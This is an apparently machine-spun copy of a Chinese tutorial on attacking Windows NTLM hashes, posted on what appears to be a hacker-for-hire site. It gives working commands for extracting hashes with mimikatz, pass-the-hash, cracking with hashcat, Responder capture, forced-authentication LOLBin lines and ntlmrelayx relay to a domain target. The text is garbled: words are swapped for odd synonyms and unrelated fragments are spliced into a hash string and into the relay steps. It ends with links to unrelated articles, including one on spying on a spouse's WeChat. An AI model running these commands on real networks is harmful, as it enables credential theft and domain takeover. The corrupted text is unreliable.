课程参谋:内网浸透——针对hash的进犯

访客5年前关于黑客接单416

本文从hash获取 *** ,爆炸hash,hash中转,中继等方面全面剖析,以直观详细的实践来了解进犯进程,进程比较详细,请耐性观看。

 

0x02 什么是NTLM-hash、net NTLM-hash

NTLM hash是windows登录暗码的一种hash,可从Windows系统中的SAM文件和域控的NTDS.dit文件中取得全部用户的hash(比方用Mimikatz提取),获取该hash之后,可进行爆炸明文、哈希传递(PtH进犯),

Net-NTLM的hash是根据NTLM的hash值经过必定的算法发作的,获取Net-NTLM的hash之后,可进行爆炸明文、运用 *** b进行中继进犯,该hash不能进行哈希传递进犯。
什么是NTLM hash?

NTLM hash的生成 *** :

1、将明文口令转换成十六进制的格局

2、把十六进制转换成Unicode格局,每个字节之后增加0x00

3、再对Unicode字符串作MD4加密,生成32位的十六进制数字串

这儿我经过mimikat *** 西先直观的了解NTLM hash,mimikatz直接从 lsass.exe 里获取windows处于active状况账号明文暗码,以windows server2012为例:

从上图发现:

NTLM hash:A1E33A2281B8C6DBC2373BFF87E8CB6E

明文暗码:123456Abc

 

0x03 对NTLM hash暴力破解

假如经过其它途径取得此hash,即A1E33A2281B8C6DBC2373BFF87E8CB6E,可用hashcat进行字典暴力破解,Hashcat参数如下:

hashcat64.exe -m 1000 A1E33A2281B8C6DBC2373BFF87E8CB6E example.dict -o out.txt —force

参数阐明:
-m 挑选哈希类别,1000为NTLM
-o 输出破解成功的明文
example.dict 明文字典

翻开out.txt,发现明文123456Abc

留意:

因为windows server2012 r2、windwos 8.1以及更高版别都做了加固,即制止明文缓存到内存,而mimikatz是根据内存获取明文暗码,则无法直接经过mimikatz获取明文暗码,直接提取成果为“null”,但可经过修正注册表来获取。

参看

受维护用户 ( Protected Users )

http://www.bubuko.com/infodetail-2077149.html

 

0x04 NTLM哈希传递

哈希传递浅显来讲,便是不需求明文登录,用NTLM hash可直接进行登录。

在我们运用某服务时,Windows会带上本身的认证信息进行检验登录,这个认证信息其实便是Net-NTLM的Hash,我们运用哪些服务会让Windows带上本身认证信息登录?如访问 *** b同享文件夹等,此刻会运用认证信息检验登录,而且调用lsass内存中的hash缓存检验登录,此刻运用mimikatz等东西修正缓存的hash为获取得到的hash,然后运用修正的hash进行登录,这是哈希传递的原理。文章后边讲到的获取Net-NTLM的hash,其实便是运用带认证信息访问 *** b,如让处理员访问此wdb:<img src="192.168.191.129xx">,192.168.191.129被进犯者操控的一台内网PC,可获取处理员的Net-NTLM hash。

先讲下认证恳求进程:

1、客户端先对在本地对暗码加密成为暗码散列
2、客户端发送认证恳求,即发作明文账号
3、服务器回来一个16位的随机数字发送给客户端,作为一个 challenge
4、客户端再用进程1的暗码散列来加密这个 challenge ,作为 response回来给服务器。
5、服务器把用户名、给客户端的challenge 、客户端回来的 response ,发送域操控器
6、域操控器运用此用户名在SAM暗码处理库的暗码散列,加密给客户端的challenge
7、与进程4客户端加密的challenge比较,假如两个challenge共同,认证成功

哈希传递缝隙发作在进程4中,直接运用修正缓存后的hash,进行challenge加密,对challenge 加密的hash现已不是发送账号对应的hash,而是进犯者经过其他途径获取的hash进行challenge加密。
Pth进犯演示:

靶机ip:

进犯机ip:

假定现已取得NTLM hash:

处理员身份运转mimikatz:

mimikatz履行指令参数:

sekurlsa::pth /user:Ancert /domain:WIN-0HE0PTAL9L4 /ntlm:A1E33A2281B8C6DBC2373BFF87E8CB6E

此刻再进行其它认证操作,可直接用获取的方针hash进行登录认证。

 

0x05 Net-NTLM hash获取

Net-NTLM hash不能直接获取,经过Responder东西进行阻拦获取,此hash不能进行哈希传递,但可进行中继转发,运用Responder等中间人东西,结合其它东西可自动化进行阻拦获取并中继转发,其它东西如 Impacket的ntlmrelayx.py进行中继转发。

在进犯机上运转Responder,此刻进犯机模仿为 *** B服务让受害者进行认证登录,经过设置几个模仿的歹意看护进程(如SQL服务器,FTP,HTTP和 *** B服务器等)来直接提示凭证或模仿质询 – 呼应验证进程并捕获客户端发送的必要 hash,当受害者机器检验登陆进犯者机器,responder就能够获取受害者机器用户的NTLMv2哈希值。。

Responder下载安装:

https://github.com/lgandx/Responder

Responder操作演示

客户端IP:

进犯机IP:

1、 无需修正Responder.conf,因为此刻 *** B、HTTP服务不要封闭,等中继进犯时才封闭这两个服务。因而这儿先演示Responder怎样获取net-NTLM hash,在中继进犯里封闭 *** B、HTTP,是因为此刻不再由Responder获取hash,而是直接让ntlmrelayx.py来结束这一使命。

2、 进犯机履行 python Responder.py -I eth0,此刻处于监听状况

3、 运用 *** B协议,客户端在联接服务端时,默许先运用本机的用户名和暗码hash检验登录,所以能够模仿 *** B服务器然后截获hash,履行如下指令都能够得到hash。
客户端履行如下指令,进犯机的Responder能收到。

> net.exe use hostshare > attrib.exe hostshare  > bcdboot.exe hostshare  > bdeunlock.exe hostshare  > cacls.exe hostshare  > certreq.exe hostshare #(noisy, pops an error dialog) > certutil.exe hostshare  > cipher.exe hostshare  > ClipUp.exe -l hostshare  > cmdl32.exe hostshare  > cmstp.exe /s hostshare  > colorcpl.exe hostshare #(noisy, pops an error dialog)  > comp.exe /N=0 hostshare hostshare  > compact.exe hostshare  > control.exe hostshare  > convertvhd.exe -source hostshare -destination hostshare  > Defrag.exe hostshare  > diskperf.exe hostshare  > dispdiag.exe -out hostshare  > doskey.exe /MACROFILE=hostshare  > esentutl.exe /k hostshare  > expand.exe hostshare  > extrac32.exe hostshare  > FileHistory.exe hostshare #(noisy, pops a gui)  > findstr.exe * hostshare  > fontview.exe hostshare #(noisy, pops an error dialog)  > fvenotify.exe hostshare #(noisy, pops an access denied error)  > FXSCOVER.exe hostshare #(noisy, pops GUI)  > hwrcomp.e建议配备xe -check hostshare  > hwrreg.exe hostshare  > icacls.exe hostshare   > licensingdiag.exe -cab hostshare  > lodctr.exe hostshare  > lpksetup.exe /p hostshare /s  > makecab.exe hostshare  > msiexec.exe /update hostshare /quiet  > msinfo32.exe hostshare #(noisy, pops a "cannot open" dialog)  > mspaint.exe hostshare #(noisy, invalid path to png error)  > msra.exe /openfile hostshare #(noisy, error)  > mstsc.exe hostshare #(noisy, error)  > netcfg.exe -l hostshare -c p -i foo  

客户端履行 net use 192.168.191.131aaa

4、 进犯机成功收到NTLMv2-SSP Hash

Ancert::WIN-0HEOPTAL9L4:75c3bef66ef94f92:2424A1EA007E01413DD6653404BB7819:0101000000000000C0653150DE09D2018D964804B8A33ECB000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D201060004000200000008003000300000000000000001000000002000007AC21B7085961E257ABD8B489929693CDD3E37B624EC1AA3C62AE0F11516CBF80A001000000000000000000000000000000000000900280063006900660073002F003100390032002E003100360038002E003100390031002E00310033003100000000000000000000000000

爆炸net-NT

LM hash

持续用hashcat进行hash爆炸,Hashcat参数如下:

hashcat64.exe -m 5600 Ancert::WIN-0HEOPTAL9L4:75c3bef66ef94f92:2424A1EA007E01413DD6653404BB7819:0101000000000000C0653150DE09D2018D964804B8A33ECB000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0上面这段PowerShell代码段运用了WMI来枚举全部的EXE和DLL。之所以挑选这种 *** ,而不挑选Get-ChildItem,是因为它在检验访问其无权访问的文件时,有或许引发失常。653150DE09D201060004000200000008003000300000000000000001000000002000007AC21B7085961E257ABD8B489929693CDD3E37B624EC1AA3C62AE0F11516CBF80A001000000000000000000000000000000000000900280063006900660073002F003100390032002E003100360038002E003100390031002E00310033003100000000000000000000000000 example.dict -o out.txt --force

参数阐明:

-m 挑选哈希类别,5600为net-NTLM

成功破解出明文暗码,如下图:

翻开out.txt,发现破解出明文123456Abc

 

0x06 *** B中继进犯

前面文章说过了,当获取到net-NTLM hash之后,因为不能经过相似哈希传递的修正缓存hash进行认证,此hash无法进行哈希传递,怎样进行进犯呢?可经过Responder东西阻拦处理员的net-NTLM hash,合作ntlmrelayx.py进行中继转发。

Impacket下载:

git clone https://github.com/CoreSecurity/impacket.git

进行中继条件:方针 *** B签名需求封闭,在 *** B联接中,需求运用安全机制来维护服务器和客户端之间传输数据的完整性,而这种安全机制便是 *** B签名和加密,假如封闭 *** B签名,会答应进犯者阻拦认证进程,而且将取得hash在其他机器上进行重放,,然后取得域管权限。

现在 *** B常用来做为 *** B文件同享、打印机,假如签名封闭,或许导致文件同享、打印机被侵略。

比方我用虚拟机建立的 *** B文件同享如下,详细认证登录进程文章前面部分已讲过,看看这个作用:

虚拟机IP:192.168.191.139

先勘探方针是否已封闭 *** B签名,指令如下:

nmap --script *** b-security-mode.nse -p445 192.168.191.139 --open

如下是我用虚拟机建立的域控环境测验,中继转发操作:

域内普通用户-受害者机器(win7)

域处理员(administrator)机器(windows server 2012 r2)

kali linux 进犯者机器

1、Responder封闭 *** B、HTTP

1.进入的带外ICMP差错消息将匹配规则;

[1][2][3][4][5]黑客接单网

2、履行python Responder.py -I eth0 -r -d –w

3、履行python ntlmrelayx.py -tf targets.txt -socks - *** b2support

阐明 :

targets.txt内容为域内受害IP 192.168.191.139

python ntlmrelayx.py -t 192.168.191.139 -socks - *** b2support //

4、域管模仿输入一个同享,生成一个LLMNR恳求

5、经过Responder发送

6、NTLMv2哈希凭证被中继

进犯流程总结:

1、封闭Responder的 *** B和HTTP服务, 运转Responder东西来截取Net-NTLM哈希值

2、运转ntlmrelayx.

------b)security adminstrators 可处理服务器的登录。

py脚本,将Net-NTLM哈希值发送到ntlmrelayx.py脚本的 *** B和HTTP服务

3、ntlmrelayx.py将hash发送到方针列表中,假如中继操作履行成功会触发告诉指令。

这儿先大约了解下中继转发的原理基础,鄙人一篇会结合DeathStar和Empire,演示自动化域浸透,以及对net NTLM-hash的运用。

本文由安全客原创发布 
转载,请参看转载声明,注明出处: https://www.anquanke.com/post/id/177123 
安全客 - 有思维的安全新媒体

 

课程参谋:内网浸透——针对hash的进犯

获取项目源码:运用Elcomsoft系统恢复东西 *** 一个可发起的Windows PE闪存2.Kerberoasting可是只需一条指令即可“Net Use /Delete %computername%”内网渗透——针对hash的攻击

课程顾问那么我们该怎样进行app缝隙的开掘呢?首要,关于从web安全转战移动端缝隙开掘的安全工作者而言,当然想挖一挖和自己地址领域比较邻近的缝隙,而app的服务端底子和web安全领域的服务端差不多,只是web程序它的客户端更多的是浏览器,而移动运用它一般都有一个能够设备在移动设备上的app程序。所以,关于app服务端缝隙的开掘上面,我们照样能够仰仗以往的web阅历,对其间的一些xss,ssrf,sql注入,任意文件读取等缝隙进行开掘。只是只是带手机在外面逛了一圈,还来不及发挥任何操作,信息就现已暴露了。信赖我们心里免不了有一丝严重,也必定猎奇,这个小小的“智能盒子”究竟是怎样结束他的这些功用的?我们一同来看看。1、NTFS文件系统中的时间特色参看来历:https://firewalld.org/documentation/

然后运用gcc编译demo.c文件,并进步编译文件的SUID权限。SetSPN进一步的谷歌搜索之后,我在StackOverFlow上找到了替代 *** ,Android 4.4(katkat)能够将蓝牙数据包记载在一个文件中,我深化了解了一下,发现需求启用开发者方式,联接蓝牙设备然后交互,全部记载将会被记载到SD卡中的“btsnoop_hci”文件中。用如下指令编译课程顾问

我们先来看看,运用程序中的类都有哪些。

--- 000 0内网渗透——针对hash的攻击

课程顾问NTSTATUS TriggerPoolOverflow(IN PVOID UserBuffer, IN SIZE_T Size) {在这一部分中,我们选取了10款有代表性的勒索软件,下面我们将逐个研讨它们用到的加密 *** 。关于智能锁安全,用户需求了解的两个不安全概念? -M, --make *** 咖啡

mkdir("./upload");# 不答应空暗码课程顾问

try {美国国土安全部,对加利福尼亚州一个涉嫌儿童色情的案件的查询;内网渗透——针对hash的攻击

设备虚拟机客户东西的 *** 并没有很大改动,在最新的Vmware(Workstation和Fusion)以及VirtualBox中都能够正常作业。import netaddr

黑客首要先运用一个“at”指令传达一个后门程序

0x01 无缺的运用链PS C:> Get-ServiceFilePermission
本文标题:课程参谋:内网浸透——针对hash的进犯

相关文章

黑客战衣(黑客帝国黑风衣)

黑客战衣(黑客帝国黑风衣)

本文目录一览: 1、黑客与骇客、红客的区别 2、黑客和骇客有啥子区别吗? 3、黑客帝国中的武器单品 黑客与骇客、红客的区别 “红客”词源来源于黑客,在中国,红色有着特定的价值含义,正义、道德...

最好玩的辽宁4大旅游景点(每个都值得去)

最好玩的辽宁4大旅游景点(每个都值得去)

本溪水洞 本溪水洞,国家AAAAA级旅游景区。本溪水洞位于辽宁省本溪市东北35公里处。 锦州笔架山 辽宁锦州笔架山坐落在笔架山风景区内,位于我国辽宁省西部 青山沟 青山沟位于...

羊驼最便宜一只多少元

  一般羊驼我见过最自制的4000一只 可是是在澳大利几多亚 运返国运费会很贵吧 好一点的羊驼要6万阁下吧 农场主一般会一次卖给你两只羊驼 一只太孑立了 对羊驼欠好 一般都。   你好,羊驼价值在20...

直播排名第一的是哪个平台(2020国内全直播平台收入排行榜)

直播排名第一的是哪个平台(2020国内全直播平台收入排行榜)

7月21日信息,为提升直播电商行业发展点评科学研究,推动直播电商业态创新身心健康发展趋势,浙江网络技术推动管理中心协同浙江省国际性网络技术研究所、杭州市脸朝网络科技有限责任公司等科学研究组织和大数...

如何远程监控老公微信聊天(同步接收老公微信聊天记录)

每日要闻去年9月,我丈夫出差,遇到了开餐馆的老人。那女人30多岁。她有三个男朋友,但没有嫁给她。她经常在朋友圈里寄一些自画像。我丈夫和她的两个微信互动非常火爆,但他总是记得删除聊天记录。 如何远程监...

伴游什么网页-【郑娣】

“伴游什么网页-【郑娣】” 春夏秋冬2017的伴游旅行期待:约会美女,留住美好的一天。享受人生,快乐每一天。青岛商务联系方式会根据他们的公司提供:.商务男装模特招聘了,要求形象好气质佳,平时就是试...